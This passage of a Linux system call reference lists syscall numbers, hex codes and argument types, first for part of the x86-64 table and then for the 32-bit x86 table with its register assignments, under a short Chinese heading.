| 254 | sys_inotify_add_watch | 0xFE | int fd | const char *pathname | u32 mask | |||
| 255 | sys_inotify_rm_watch | 0xFF | int fd | __s32 wd | ||||
| 256 | sys_migrate_pages | 0x100 | pid_t pid | unsigned long maxnode | const unsigned long *old_nodes | const unsigned long *new_nodes | ||
| 257 | sys_openat | 0x101 | int dfd | const char *filename | int flags | int mode | ||
| 258 | sys_mkdirat | 0x102 | int dfd | const char *pathname | int mode | |||
| 259 | sys_mknodat | 0x103 | int dfd | const char *filename | int mode | unsigned dev | ||
| 260 | sys_fchownat | 0x104 | int dfd | const char *filename | uid_t user | gid_t group | int flag | |
| 261 | sys_futimesat | 0x105 | int dfd | const char *filename | struct timeval *utimes | |||
| 262 | sys_newfstatat | 0x106 | int dfd | const char *filename | struct stat *statbuf | int flag | ||
| 263 | sys_unlinkat | 0x107 | int dfd | const char *pathname | int flag | |||
| 264 | sys_renameat | 0x108 | int oldfd | const char *oldname | int newfd | const char *newname | ||
| 265 | sys_linkat | 0x109 | int oldfd | const char *oldname | int newfd | const char *newname | int flags | |
| 266 | sys_symlinkat | 0x10A | const char *oldname | int newfd | const char *newname | |||
| 267 | sys_readlinkat | 0x10B | int dfd | const char *pathname | char *buf | int bufsiz | ||
| 268 | sys_fchmodat | 0x10C | int dfd | const char *filename | mode_t mode | |||
| 269 | sys_faccessat | 0x10D | int dfd | const char *filename | int mode | |||
| 270 | sys_pselect6 | 0x10E | int n | fd_set *inp | fd_set *outp | fd_set *exp | struct timespec *tsp | void *sig |
| 271 | sys_ppoll | 0x10F | struct pollfd *ufds | unsigned int nfds | struct timespec *tsp | const sigset_t *sigmask | size_t sigsetsize | |
| 272 | sys_unshare | 0x110 | unsigned long unshare_flags | |||||
| 273 | sys_set_robust_list | 0x111 | struct robust_list_head *head | size_t len | ||||
| 274 | sys_get_robust_list | 0x112 | int pid | struct robust_list_head **head_ptr | size_t *len_ptr | |||
| 275 | sys_splice | 0x113 | int fd_in | loff_t *off_in | int fd_out | loff_t *off_out | size_t len | unsigned int flags |
| 276 | sys_tee | 0x114 | int fdin | int fdout | size_t len | unsigned int flags | ||
| 277 | sys_sync_file_range | 0x115 | long fd | loff_t offset | loff_t bytes | long flags | ||
| 278 | sys_vmsplice | 0x116 | int fd | const struct iovec *iov | unsigned long nr_segs | unsigned int flags | ||
| 279 | sys_move_pages | 0x117 | pid_t pid | unsigned long nr_pages | const void **pages | const int *nodes | int *status | int flags |
| 280 | sys_utimensat | 0x118 | int dfd | const char *filename | struct timespec *utimes | int flags | ||
| 281 | sys_epoll_pwait | 0x119 | int epfd | struct epoll_event *events | int maxevents | int timeout | const sigset_t *sigmask | size_t sigsetsize |
| 282 | sys_signalfd | 0x11A | int ufd | sigset_t *user_mask | size_t sizemask | |||
| 283 | sys_timerfd_create | 0x11B | int clockid | int flags | ||||
| 284 | sys_eventfd | 0x11C | unsigned int count | |||||
| 285 | sys_fallocate | 0x11D | long fd | long mode | loff_t offset | loff_t len | ||
| 286 | sys_timerfd_settime | 0x11E | int ufd | int flags | const struct itimerspec *utmr | struct itimerspec *otmr | ||
| 287 | sys_timerfd_gettime | 0x11F | int ufd | struct itimerspec *otmr | ||||
| 288 | sys_accept4 | 0x120 | int fd | struct sockaddr *upeer_sockaddr | int *upeer_addrlen | int flags | ||
| 289 | sys_signalfd4 | 0x121 | int ufd | sigset_t *user_mask | size_t sizemask | int flags | ||
| 290 | sys_eventfd2 | 0x122 | unsigned int count | int flags | ||||
| 291 | sys_epoll_create1 | 0x123 | int flags | |||||
| 292 | sys_dup3 | 0x124 | unsigned int oldfd | unsigned int newfd | int flags | |||
| 293 | sys_pipe2 | 0x125 | int *filedes | int flags | ||||
| 294 | sys_inotify_init1 | 0x126 | int flags | |||||
| 295 | sys_preadv | 0x127 | unsigned long fd | const struct iovec *vec | unsigned long vlen | unsigned long pos_l | unsigned long pos_h | |
| 296 | sys_pwritev | 0x128 | unsigned long fd | const struct iovec *vec | unsigned long vlen | unsigned long pos_l | unsigned long pos_h | |
| 297 | sys_rt_tgsigqueueinfo | 0x129 | pid_t tgid | pid_t pid | int sig | siginfo_t *uinfo | ||
| 298 | sys_perf_event_open | 0x12A | struct perf_event_attr *attr_uptr | pid_t pid | int cpu | int group_fd | unsigned long flags | |
| 299 | sys_recvmmsg | 0x12B | int fd | struct msghdr *mmsg | unsigned int vlen | unsigned int flags | struct timespec *timeout | |
| 300 | sys_fanotify_init | 0x12C | unsigned int flags | unsigned int event_f_flags | ||||
| 301 | sys_fanotify_mark | 0x12D | long fanotify_fd | long flags | __u64 mask | long dfd | long pathname | |
| 302 | sys_prlimit64 | 0x12E | pid_t pid | unsigned int resource | const struct rlimit64 *new_rlim | struct rlimit64 *old_rlim | ||
| 303 | sys_name_to_handle_at | 0x12F | int dfd | const char *name | struct file_handle *handle | int *mnt_id | int flag | |
| 304 | sys_open_by_handle_at | 0x130 | int dfd | const char *name | struct file_handle *handle | int *mnt_id | int flags | |
| 305 | sys_clock_adjtime | 0x131 | clockid_t which_clock | struct timex *tx | ||||
| 306 | sys_syncfs | 0x132 | int fd | |||||
| 307 | sys_sendmmsg | 0x133 | int fd | struct mmsghdr *mmsg | unsigned int vlen | unsigned int flags | ||
| 308 | sys_setns | 0x134 | int fd | int nstype | ||||
| 309 | sys_getcpu | 0x135 | unsigned *cpup | unsigned *nodep | struct getcpu_cache *unused | |||
| 310 | sys_process_vm_readv | 0x136 | pid_t pid | const struct iovec *lvec | unsigned long liovcnt | const struct iovec *rvec | unsigned long riovcnt | unsigned long flags |
| 311 | sys_process_vm_writev | 0x137 | pid_t pid | const struct iovec *lvec | unsigned long liovcnt | const struct iovcc *rvec | unsigned long riovcnt | unsigned long flags |
# 在 32 位系统中
| NR | syscall | %eax | arg0 (%ebx) | arg1 (%ecx) | arg2 (%edx) | arg3 (%esi) | arg4 (%edi) | arg5 (%ebp) |
|---|---|---|---|---|---|---|---|---|
| 0 | restart_syscall | 0x00 | - | - | - | - | - | - |
| 1 | exit | 0x01 | int error_code | - | - | - | - | - |
| 2 | fork | 0x02 | - | - | - | - | - | - |
| 3 | read | 0x03 | unsigned int fd | char *buf | size_t count | - | - | - |
| 4 | write | 0x04 | unsigned int fd | const char *buf | size_t count | - | - | - |
| 5 | open | 0x05 | const char *filename | int flags | umode_t mode | - | - | - |
| 6 | close | 0x06 | unsigned int fd | - | - | - | - | - |
| 7 | waitpid | 0x07 | pid_t pid | int *stat_addr | int options | - | - | - |
| 8 | creat | 0x08 | const char *pathname | umode_t mode | - | - | - | - |
| 9 | link | 0x09 | const char *oldname | const char *newname | - | - | - | - |
| 10 | unlink | 0x0a | const char *pathname | - | - | - | - | - |
| 11 | execve | 0x0b | const char *filename | const char *const *argv | const char *const *envp | - | - | - |
| 12 | chdir | 0x0c | const char *filename | - | - | - | - | - |
| 13 | time | 0x0d | time_t *tloc | - | - | - | - | - |
| 14 | mknod | 0x0e | const char *filename | umode_t mode | unsigned dev | - | - | - |
| 15 | chmod | 0x0f | const char *filename | umode_t mode | - | - | - | - |
| 16 | lchown | 0x10 | const char *filename | uid_t user | gid_t group | - | - | - |
| 17 | break | 0x11 | ? | ? | ? | ? | ? | ? |
| 18 | oldstat | 0x12 | ? | ? | ? | ? | ? | ? |
| 19 | lseek | 0x13 | unsigned int fd | off_t offset | unsigned int whence | - | - | - |
| 20 | getpid | 0x14 | - | - | - | - | - | - |
| 21 | mount | 0x15 | char *dev_name | char *dir_name | char *type | unsigned long flags | void *data | - |
| 22 | umount | 0x16 | char *name | int flags | - | - | - | - |
| 23 | setuid | 0x17 | uid_t uid | - | - | - | - | - |
| 24 | getuid | 0x18 | - | - | - | - | - | - |
| 25 | stime | 0x19 | time_t *tptr | - | - | - | - | - |
| 26 | ptrace | 0x1a | long request | long pid | unsigned long addr | unsigned long data | - | - |
| 27 | alarm | 0x1b | unsigned int seconds | - | - | - | - | - |
| 28 | oldfstat | 0x1c | ? | ? | ? | ? | ? | ? |
| 29 | pause | 0x1d | - | - | - | - | - | - |
| 30 | utime | 0x1e | char *filename | struct utimbuf *times | - | - | - | - |
| 31 | stty | 0x1f | ? | ? | ? | ? | ? | ? |
| 32 | gtty | 0x20 | ? | ? | ? | ? | ? | ? |
| 33 | access | 0x21 | const char *filename | int mode | - | - | - | - |
| 34 | nice | 0x22 | int increment | - | - | - | - | - |
| 35 | ftime | 0x23 | ? | ? | ? | ? | ? | ? |
| 36 | sync | 0x24 | - | - | - | - | - | - |
| 37 | kill | 0x25 | pid_t pid | int sig | - | - | - | - |
| 38 | rename | 0x26 | const char *oldname | const char *newname | - | - | - | - |
| 39 | mkdir | 0x27 | const char *pathname | umode_t mode | - | - | - | - |
| 40 | rmdir | 0x28 | const char *pathname | - | - | - | - | - |
| 41 | dup | 0x29 | unsigned int fildes | - | - | - | - | - |
| 42 | pipe | 0x2a | int *fildes | - | - | - | - | - |
| 43 | times | 0x2b | struct tms *tbuf | - | - | - | - | - |
| 44 | prof | 0x2c | ? | ? | ? | ? | ? | ? |
| 45 | brk | 0x2d | unsigned long brk | - | - | - | - | - |
| 46 | setgid | 0x2e | gid_t gid | - | - | - | - | - |
| 47 | getgid | 0x2f | - | - | - | - | - | - |
| 48 | signal | 0x30 | int sig | __sighandler_t handler | - | - | - | - |
| 49 | geteuid | 0x31 | - | - | - | - | - | - |
| 50 | getegid | 0x32 | - | - | - | - | - | - |
| 51 | acct | 0x33 | const char *name | - | - | - | - | - |
| 52 | umount2 | 0x34 | ? | ? | ? | ? | ? | ? |
| 53 | lock | 0x35 | ? | ? | ? | ? | ? | ? |
| 54 | ioctl | 0x36 | unsigned int fd | unsigned int cmd | unsigned long arg | - | - | - |
| 55 | fcntl | 0x37 | unsigned int fd | unsigned int cmd | unsigned long arg | - | - | - |
| 56 | mpx | 0x38 | ? | ? | ? | ? | ? | ? |
| 57 | setpgid | 0x39 | pid_t pid | pid_t pgid | - | - | - | - |
| 58 | ulimit | 0x3a | ? | ? | ? | ? | ? | ? |
| 59 | oldolduname | 0x3b | ? | ? | ? | ? | ? | ? |
| 60 | umask | 0x3c | int mask | - | - | - | - | - |
| 61 | chroot | 0x3d | const char *filename | - | - | - | - | - |
| 62 | ustat | 0x3e | unsigned dev | struct ustat *ubuf | - | - | - | - |
| 63 | dup2 | 0x3f | unsigned int oldfd | unsigned int newfd | - | - | - | - |
| 64 | getppid | 0x40 | - | - | - | - | - | - |
| 65 | getpgrp | 0x41 | - | - | - | - | - | - |
| 66 | setsid | 0x42 | - | - | - | - | - | - |
| 67 | sigaction | 0x43 | int | const struct old_sigaction * | struct old_sigaction * | - | - | - |
| 68 | sgetmask | 0x44 | - | - | - | - | - | - |
| 69 | ssetmask | 0x45 | int newmask | - | - | - | - | - |
| 70 | setreuid | 0x46 | uid_t ruid | uid_t euid | - | - | - | - |
| 71 | setregid | 0x47 | gid_t rgid | gid_t egid | - | - | - | - |
| 72 | sigsuspend | 0x48 | int unused1 | int unused2 | old_sigset_t mask | - | - | - |
| 73 | sigpending | 0x49 | old_sigset_t *uset | - | - | - | - | - |
| 74 | sethostname | 0x4a | char *name | int len | - | - | - | - |
| 75 | setrlimit | 0x4b | unsigned int resource | struct rlimit *rlim | - | - | - | - |
| 76 | getrlimit | 0x4c | unsigned int resource | struct rlimit *rlim | - | - | - | - |
| 77 | getrusage | 0x4d | int who | struct rusage *ru | - | - | - | - |
| 78 | gettimeofday | 0x4e | struct timeval *tv | struct timezone *tz | - | - | - | - |
| 79 | settimeofday | 0x4f | struct timeval *tv | struct timezone *tz | - | - | - | - |
| 80 | getgroups | 0x50 | int gidsetsize | gid_t *grouplist | - | - | - | - |
| 81 | setgroups | 0x51 | int gidsetsize | gid_t *grouplist | - | - | - | - |
| 82 | select | 0x52 | int n | fd_set *inp | fd_set *outp | fd_set *exp | struct timeval *tvp | - |
| 83 | symlink | 0x53 | const char *old | const char *new | - | - | - | - |
| 84 | oldlstat | 0x54 | ? | ? | ? | ? | ? | ? |
| 85 | readlink | 0x55 | const char *path | char *buf | int bufsiz | - | - | - |
| 86 | uselib | 0x56 | const char *library | - | - | - | - | - |
| 87 | swapon | 0x57 | const char *specialfile | int swap_flags | - | - | - | - |
| 88 | reboot | 0x58 | int magic1 | int magic2 | unsigned int cmd | void *arg | - | - |
| 89 | readdir | 0x59 | ? | ? | ? | ? | ? | ? |
| 90 | mmap | 0x5a | ? | ? | ? | ? | ? | ? |
| 91 | munmap | 0x5b | unsigned long addr | size_t len | - | - | - | - |
| 92 | truncate | 0x5c | const char *path | long length | - | - | - | - |
| 93 | ftruncate | 0x5d | unsigned int fd | unsigned long length | - | - | - | - |
| 94 | fchmod | 0x5e | unsigned int fd | umode_t mode | - | - | - | - |
| 95 | fchown | 0x5f | unsigned int fd | uid_t user | gid_t group | - | - | - |
| 96 | getpriority | 0x60 | int which | int who | - | - | - | - |
| 97 | setpriority | 0x61 | int which | int who | int niceval | - | - | - |
| 98 | profil | 0x62 | ? | ? | ? | ? | ? | ? |
| 99 | statfs | 0x63 | const char * path | struct statfs *buf | - | - | - | - |
| 100 | fstatfs | 0x64 | unsigned int fd | struct statfs *buf | - | - | - | - |
| 101 | ioperm | 0x65 | unsigned long from | unsigned long num | int on | - | - | - |
| 102 | socketcall | 0x66 | int call | unsigned long *args | - | - | - | - |
| 103 | syslog | 0x67 | int type | char *buf | int len | - | - | - |
| 104 | setitimer | 0x68 | int which | struct itimerval *value | struct itimerval *ovalue | - | - | - |
| 105 | getitimer | 0x69 | int which | struct itimerval *value | - | - | - | - |
| 106 | stat | 0x6a | const char *filename | struct __old_kernel_stat *statbuf | - | - | - | - |
| 107 | lstat | 0x6b | const char *filename | struct __old_kernel_stat *statbuf | - | - | - | - |
| 108 | fstat | 0x6c | unsigned int fd | struct __old_kernel_stat *statbuf | - | - | - | - |
| 109 | olduname | 0x6d | struct oldold_utsname * | - | - | - | - | - |
| 110 | iopl | 0x6e | ? | ? | ? | ? | ? | ? |
| 111 | vhangup | 0x6f | - | - | - | - | - | - |
| 112 | idle | 0x70 | ? | ? | ? | ? | ? | ? |
| 113 | vm86old | 0x71 | ? | ? | ? | ? | ? | ? |
| 114 | wait4 | 0x72 | pid_t pid | int *stat_addr | int options | struct rusage *ru | - | - |
| 115 | swapoff | 0x73 | const char *specialfile | - | - | - | - | - |
| 116 | sysinfo | 0x74 | struct sysinfo *info | - | - | - | - | - |
| 117 | ipc | 0x75 | unsigned int call | int first | unsigned long second | unsigned long third | void *ptr | long fifth |
| 118 | fsync | 0x76 | unsigned int fd | - | - | - | - | - |
| 119 | sigreturn | 0x77 | ? | ? | ? | ? | ? | ? |
| 120 | clone | 0x78 | unsigned long | unsigned long | int * | int * | unsigned long | - |
| 121 | setdomainname | 0x79 | char *name | int len | - | - | - | - |
| 122 | uname | 0x7a | struct old_utsname * | - | - | - | - | - |
| 123 | modify_ldt | 0x7b | ? | ? | ? | ? | ? | ? |
| 124 | adjtimex | 0x7c | struct timex *txc_p | - | - | - | - | - |
| 125 | mprotect | 0x7d | unsigned long start | size_t len | unsigned long prot | - | - | - |
| 126 | sigprocmask | 0x7e | int how | old_sigset_t *set | old_sigset_t *oset | - | - | - |
| 127 | create_module | 0x7f | ? | ? | ? | ? | ? | ? |
| 128 | init_module | 0x80 | void *umod | unsigned long len | const char *uargs | - | - | - |
| 129 | delete_module | 0x81 | const char *name_user | unsigned int flags | - | - | - | - |
| 130 | get_kernel_syms | 0x82 | ? | ? | ? | ? | ? | ? |
| 131 | quotactl | 0x83 | unsigned int cmd | const char *special | qid_t id | void *addr | - | - |
| 132 | getpgid | 0x84 | pid_t pid | - | - | - | - | - |
| 133 | fchdir | 0x85 | unsigned int fd | - | - | - | - | - |
| 134 | bdflush | 0x86 | int func | long data | - | - | - | - |
| 135 | sysfs | 0x87 | int option | unsigned long arg1 | unsigned long arg2 | - | - | - |
| 136 | personality | 0x88 | unsigned int personality | - | - | - | - | - |
| 137 | afs_syscall | 0x89 | ? | ? | ? | ? | ? | ? |
| 138 | setfsuid | 0x8a | uid_t uid | - | - | - | - | - |
| 139 | setfsgid | 0x8b | gid_t gid | - | - | - | - | - |
| 140 | _llseek | 0x8c | ? | ? | ? | ? | ? | ? |
| 141 | getdents | 0x8d | unsigned int fd | struct linux_dirent *dirent | unsigned int count | - | - | - |
| 142 | _newselect | 0x8e | ? | ? | ? | ? | ? | ? |
| 143 | flock | 0x8f | unsigned int fd | unsigned int cmd | - | - | - | - |
| 144 | msync | 0x90 | unsigned long start | size_t len | int flags | - | - | - |
| 145 | readv | 0x91 | unsigned long fd | const struct iovec *vec | unsigned long vlen | - | - | - |
| 146 | writev | 0x92 | unsigned long fd | const struct iovec *vec | unsigned long vlen | - | - | - |
| 147 | getsid | 0x93 | pid_t pid | - | - | - | - | - |
| 148 | fdatasync | 0x94 | unsigned int fd | - | - | - | - | - |
| 149 | _sysctl | 0x95 | ? | ? | ? | ? | ? | ? |
| 150 | mlock | 0x96 | unsigned long start | size_t len | - | - | - | - |
| 151 | munlock | 0x97 | unsigned long start | size_t len | - | - | - | - |
| 152 | mlockall | 0x98 | int flags | - | - | - | - | - |
| 153 | munlockall | 0x99 | - | - | - | - | - | - |
| 154 | sched_setparam | 0x9a | pid_t pid | struct sched_param *param | - | - | - | - |
| 155 | sched_getparam | 0x9b | pid_t pid | struct sched_param *param | - | - | - | - |
| 156 | sched_setscheduler | 0x9c | pid_t pid | int policy | struct sched_param *param | - | - | - |
| 157 | sched_getscheduler | 0x9d | pid_t pid | - | - | - | - | - |
| 158 | sched_yield | 0x9e | - | - | - | - | - | - |
| 159 | sched_get_priority_max | 0x9f | int policy | - | - | - | - | - |
| 160 | sched_get_priority_min | 0xa0 | int policy | - | - | - | - | - |
| 161 | sched_rr_get_interval | 0xa1 | pid_t pid | struct timespec *interval | - | - | - | - |
| 162 | nanosleep | 0xa2 | struct __kernel_timespec *rqtp | struct __kernel_timespec *rmtp | - | - | - | - |
| 163 | mremap | 0xa3 | unsigned long addr | unsigned long old_len | unsigned long new_len | unsigned long flags | unsigned long new_addr | - |
| 164 | setresuid | 0xa4 | uid_t ruid | uid_t euid | uid_t suid | - | - | - |
| 165 | getresuid | 0xa5 | uid_t *ruid | uid_t *euid | uid_t *suid | - | - | - |
| 166 | vm86 | 0xa6 | ? | ? | ? | ? | ? | ? |
| 167 | query_module | 0xa7 | ? | ? | ? | ? | ? | ? |
| 168 | poll | 0xa8 | struct pollfd *ufds | unsigned int nfds | int timeout | - | - | - |
| 169 | nfsservctl | 0xa9 | ? | ? | ? | ? | ? | ? |
| 170 | setresgid | 0xaa | gid_t rgid | gid_t egid | gid_t sgid | - | - | - |
| 171 | getresgid | 0xab | gid_t *rgid | gid_t *egid | gid_t *sgid | - | - | - |
| 172 | prctl | 0xac | int option | unsigned long arg2 | unsigned long arg3 | unsigned long arg4 | unsigned long arg5 | - |
| 173 | rt_sigreturn | 0xad | ? | ? | ? | ? | ? | ? |
| 174 | rt_sigaction | 0xae | int | const struct sigaction * | struct sigaction * | size_t | - | - |
| 175 | rt_sigprocmask | 0xaf | int how | sigset_t *set | sigset_t *oset | size_t sigsetsize | - | - |
| 176 | rt_sigpending | 0xb0 | sigset_t *set | size_t sigsetsize | - | - | - | - |
| 177 | rt_sigtimedwait | 0xb1 | const sigset_t *uthese | siginfo_t *uinfo | const struct timespec *uts | size_t sigsetsize | - | - |
| 178 | rt_sigqueueinfo | 0xb2 | pid_t pid | int sig | siginfo_t *uinfo | - | - | - |
| 179 | rt_sigsuspend | 0xb3 | sigset_t *unewset | size_t sigsetsize | - | - | - | - |
| 180 | pread64 | 0xb4 | unsigned int fd | char *buf | size_t count | loff_t pos | - | - |
| 181 | pwrite64 | 0xb5 | unsigned int fd | const char *buf | size_t count | loff_t pos | - | - |
| 182 | chown | 0xb6 | const char *filename | uid_t user | gid_t group | - | - | - |
| 183 | getcwd | 0xb7 | char *buf | unsigned long size | - | - | - | - |
| 184 | capget | 0xb8 | cap_user_header_t header | cap_user_data_t dataptr | - | - | - | - |
| 185 | capset | 0xb9 | cap_user_header_t header | const cap_user_data_t data | - | - | - | - |
| 186 | sigaltstack | 0xba | const struct sigaltstack *uss | struct sigaltstack *uoss | - | - | - | - |
| 187 | sendfile | 0xbb | int out_fd | int in_fd | off_t *offset | size_t count | - | - |
| 188 | getpmsg | 0xbc | ? | ? | ? | ? | ? | ? |
| 189 | putpmsg | 0xbd | ? | ? | ? | ? | ? | ? |
| 190 | vfork | 0xbe | - | - | - | - | - | - |
| 191 | ugetrlimit | 0xbf | ? | ? | ? | ? | ? | ? |
| 192 | mmap2 | 0xc0 | ? | ? | ? | ? | ? | ? |
| 193 | truncate64 | 0xc1 | const char *path | loff_t length | - | - | - | - |
| 194 | ftruncate64 | 0xc2 | unsigned int fd | loff_t length | - | - | - | - |
| 195 | stat64 | 0xc3 | const char *filename | struct stat64 *statbuf | - | - | - | - |
| 196 | lstat64 | 0xc4 | const char *filename | struct stat64 *statbuf | - | - | - | - |
| 197 | fstat64 | 0xc5 | unsigned long fd | struct stat64 *statbuf | - | - | - | - |
| 198 | lchown32 | 0xc6 | ? | ? | ? | ? | ? | ? |
| 199 | getuid32 | 0xc7 | ? | ? | ? | ? | ? | ? |
| 200 | getgid32 | 0xc8 | ? | ? | ? | ? | ? | ? |
| 201 | geteuid32 | 0xc9 | ? | ? | ? | ? | ? | ? |
| 202 | getegid32 | 0xca | ? | ? | ? | ? | ? | ? |
| 203 | setreuid32 | 0xcb | ? | ? | ? | ? | ? | ? |
| 204 | setregid32 | 0xcc | ? | ? | ? | ? | ? | ? |
| 205 | getgroups32 | 0xcd | ? | ? | ? | ? | ? | ? |
| 206 | setgroups32 | 0xce | ? | ? | ? | ? | ? | ? |
| 207 | fchown32 | 0xcf | ? | ? | ? | ? | ? | ? |
| 208 | setresuid32 | 0xd0 | ? | ? | ? | ? | ? | ? |
| 209 | getresuid32 | 0xd1 | ? | ? | ? | ? | ? | ? |
| 210 | setresgid32 | 0xd2 | ? | ? | ? | ? | ? | ? |
| 211 | getresgid32 | 0xd3 | ? | ? | ? | ? | ? | ? |
| 212 | chown32 | 0xd4 | ? | ? | ? | ? | ? | ? |
| 213 | setuid32 | 0xd5 | ? | ? | ? | ? | ? | ? |
| 214 | setgid32 | 0xd6 | ? | ? | ? | ? | ? | ? |
| 215 | setfsuid32 | 0xd7 | ? | ? | ? | ? | ? | ? |
| 216 | setfsgid32 | 0xd8 | ? | ? | ? | ? | ? | ? |
| 217 | pivot_root | 0xd9 | const char *new_root | const char *put_old | - | - | - | - |
| 218 | mincore | 0xda | unsigned long start | size_t len | unsigned char * vec | - | - | - |
| 219 | madvise | 0xdb | unsigned long start | size_t len | int behavior | - | - | - |
| 220 | getdents64 | 0xdc | unsigned int fd | struct linux_dirent64 *dirent | unsigned int count | - | - | - |
| 221 | fcntl64 | 0xdd | unsigned int fd | unsigned int cmd | unsigned long arg | - | - | - |
| 222 | not implemented | 0xde | ||||||
| 223 | not implemented | 0xdf | ||||||
| 224 | gettid | 0xe0 | - | - | - | - | - | - |
| 225 | readahead | 0xe1 | int fd | loff_t offset | size_t count | - | - | - |
| 226 | setxattr | 0xe2 | const char *path | const char *name | const void *value | size_t size | int flags | - |
| 227 | lsetxattr | 0xe3 | const char *path | const char *name | const void *value | size_t size | int flags | - |
| 228 | fsetxattr | 0xe4 | int fd | const char *name | const void *value | size_t size | int flags | - |
| 229 | getxattr | 0xe5 | const char *path | const char *name | void *value | size_t size | - | - |
| 230 | lgetxattr | 0xe6 | const char *path | const char *name | void *value | size_t size | - | - |
| 231 | fgetxattr | 0xe7 | int fd | const char *name | void *value | size_t size | - | - |
| 232 | listxattr | 0xe8 | const char *path | char *list | size_t size | - | - | - |
| 233 | llistxattr | 0xe9 | const char *path | char *list | size_t size | - | - | - |
| 234 | flistxattr | 0xea | int fd | char *list | size_t size | - | - | - |
| 235 | removexattr | 0xeb | const char *path | const char *name | - | - | - | - |
| 236 | lremovexattr | 0xec | const char *path | const char *name | - | - | - | - |
| 237 | fremovexattr | 0xed | int fd | const char *name | - | - | - | - |
| 238 | tkill | 0xee | pid_t pid | int sig | - | - | - | - |
| 239 | sendfile64 | 0xef | int out_fd | int in_fd | loff_t *offset | size_t count | - | - |
| 240 | futex | 0xf0 | u32 *uaddr | int op | u32 val | struct timespec *utime | u32 *uaddr2 | u32 val3 |
| 241 | sched_setaffinity | 0xf1 | pid_t pid | unsigned int len | unsigned long *user_mask_ptr | - | - | - |
| 242 | sched_getaffinity | 0xf2 | pid_t pid | unsigned int len | unsigned long *user_mask_ptr | - | - | - |
| 243 | set_thread_area | 0xf3 | ? | ? | ? | ? | ? | ? |
| 244 | get_thread_area | 0xf4 | ? | ? | ? | ? | ? | ? |
| 245 | io_setup | 0xf5 | unsigned nr_reqs | aio_context_t *ctx | - | - | - | - |
| 246 | io_destroy | 0xf6 | aio_context_t ctx | - | - | - | - | - |
| 247 | io_getevents | 0xf7 | aio_context_t ctx_id | long min_nr | long nr | struct io_event *events | struct timespec *timeout | - |
| 248 | io_submit | 0xf8 | aio_context_t | long | struct iocb * * | - | - | - |
| 249 | io_cancel | 0xf9 | aio_context_t ctx_id | struct iocb *iocb | struct io_event *result | - | - | - |
| 250 | fadvise64 | 0xfa | int fd | loff_t offset | size_t len | int advice | - | - |
| 251 | not implemented | 0xfb | ||||||
| 252 | exit_group | 0xfc | int error_code | - | - | - | - | - |
| 253 | lookup_dcookie | 0xfd | u64 cookie64 | char *buf | size_t len | - | - | - |
| 254 | epoll_create | 0xfe | int size | - | - | - | - | - |
| 255 | epoll_ctl | 0xff | int epfd | int op | int fd | struct epoll_event *event | - | - |
| 256 | epoll_wait | 0x100 | int epfd | struct epoll_event *events | int maxevents | int timeout | - | - |
| 257 | remap_file_pages | 0x101 | unsigned long start | unsigned long size | unsigned long prot | unsigned long pgoff | unsigned long flags | - |
| 258 | set_tid_address | 0x102 | int *tidptr | - | - | - | - | - |
| 259 | timer_create | 0x103 | clockid_t which_clock | struct sigevent *timer_event_spec | timer_t * created_timer_id | - | - | - |
| 260 | timer_settime | 0x104 | timer_t timer_id | int flags | const struct __kernel_itimerspec *new_setting | struct itimerspec *old_setting | - | - |
| 261 | timer_gettime | 0x105 | timer_t timer_id | struct __kernel_itimerspec *setting | - | - | - | - |
| 262 | timer_getoverrun | 0x106 | timer_t timer_id | - | - | - | - | - |
| 263 | timer_delete | 0x107 | timer_t timer_id | - | - | - | - | - |
| 264 | clock_settime | 0x108 | clockid_t which_clock | const struct __kernel_timespec *tp | - | - | - | - |
| 265 | clock_gettime | 0x109 | clockid_t which_clock | struct __kernel_timespec *tp | - | - | - | - |
| 266 | clock_getres | 0x10a | clockid_t which_clock | struct __kernel_timespec *tp | - | - | - | - |
| 267 | clock_nanosleep | 0x10b | clockid_t which_clock | int flags | const struct __kernel_timespec *rqtp | struct __kernel_timespec *rmtp | - | - |
| 268 | statfs64 | 0x10c | const char *path | size_t sz | struct statfs64 *buf | - | - | - |
| 269 | fstatfs64 | 0x10d | unsigned int fd | size_t sz | struct statfs64 *buf | - | - | - |
| 270 | tgkill | 0x10e | pid_t tgid | pid_t pid | int sig | - | - | - |
| 271 | utimes | 0x10f | char *filename | struct timeval *utimes | - | - | - | - |
| 272 | fadvise64_64 | 0x110 | int fd | loff_t offset | loff_t len | int advice | - | - |
| 273 | vserver | 0x111 | ? | ? | ? | ? | ? | ? |
| 274 | mbind | 0x112 | unsigned long start | unsigned long len | unsigned long mode | const unsigned long *nmask | unsigned long maxnode | unsigned flags |
| 275 | get_mempolicy | 0x113 | int *policy | unsigned long *nmask | unsigned long maxnode | unsigned long addr | unsigned long flags | - |
| 276 | set_mempolicy | 0x114 | int mode | const unsigned long *nmask | unsigned long maxnode | - | - | - |
| 277 | mq_open | 0x115 | const char *name | int oflag | umode_t mode | struct mq_attr *attr | - | - |
| 278 | mq_unlink | 0x116 | const char *name | - | - | - | - | - |
| 279 | mq_timedsend | 0x117 | mqd_t mqdes | const char *msg_ptr | size_t msg_len | unsigned int msg_prio | const struct __kernel_timespec *abs_timeout | - |
| 280 | mq_timedreceive | 0x118 | mqd_t mqdes | char *msg_ptr | size_t msg_len | unsigned int *msg_prio | const struct __kernel_timespec *abs_timeout | - |
| 281 | mq_notify | 0x119 | mqd_t mqdes | const struct sigevent *notification | - | - | - | - |
| 282 | mq_getsetattr | 0x11a | mqd_t mqdes | const struct mq_attr *mqstat | struct mq_attr *omqstat | - | - | - |
| 283 | kexec_load | 0x11b | unsigned long entry | unsigned long nr_segments | struct kexec_segment *segments | unsigned long flags | - | - |
| 284 | waitid | 0x11c | int which | pid_t pid | struct siginfo *infop | int options | struct rusage *ru | - |
| 285 | not implemented | 0x11d | ||||||
| 286 | add_key | 0x11e | const char *_type | const char *_description | const void *_payload | size_t plen | key_serial_t destringid | - |
| 287 | request_key | 0x11f | const char *_type | const char *_description | const char *_callout_info | key_serial_t destringid | - | - |
| 288 | keyctl | 0x120 | int cmd | unsigned long arg2 | unsigned long arg3 | unsigned long arg4 | unsigned long arg5 | - |
| 289 | ioprio_set | 0x121 | int which | int who | int ioprio | - | - | - |
| 290 | ioprio_get | 0x122 | int which | int who | - | - | - | - |
| 291 | inotify_init | 0x123 | - | - | - | - | - | - |
| 292 | inotify_add_watch | 0x124 | int fd | const char *path | u32 mask | - | - | - |
| 293 | inotify_rm_watch | 0x125 | int fd | __s32 wd | - | - | - | - |
| 294 | migrate_pages | 0x126 | pid_t pid | unsigned long maxnode | const unsigned long *from | const unsigned long *to | - | - |
| 295 | openat | 0x127 | int dfd | const char *filename | int flags | umode_t mode | - | - |
